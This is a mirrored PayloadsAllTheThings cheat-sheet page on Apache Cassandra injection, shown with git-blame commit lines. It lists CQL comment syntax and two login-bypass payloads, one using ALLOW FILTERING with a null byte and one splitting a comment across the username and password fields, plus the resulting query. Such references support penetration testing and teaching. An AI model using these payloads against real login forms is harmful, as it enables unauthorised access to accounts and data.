ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 10:26:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
fe8c7be2fb
PayloadsAllTheThings/SQL Injection/Cassandra Injection.md

37 lines
794 B
Markdown
Raw Normal View History

Cassandra SQL + XSS MD + PHP Type Juggling
2018-09-10 18:40:43 +00:00
# Cassandra Injection
> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
## Cassandra comment
```sql
/* Cassandra Comment */
```
## Cassandra - Login Bypass
### Login Bypass 0
```sql
username: admin' ALLOW FILTERING; %00
password: ANY
```
### Login Bypass 1
```sql
username: admin'/*
password: */and pass>'
```
The injection would look like the following SQL query
```sql
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
```
Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php)
Adding references sectio
2018-12-24 14:02:50 +00:00
## References
Cassandra SQL + XSS MD + PHP Type Juggling
2018-09-10 18:40:43 +00:00
* [Injection In Apache Cassandra Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)
Reference in New Issue Copy Permalink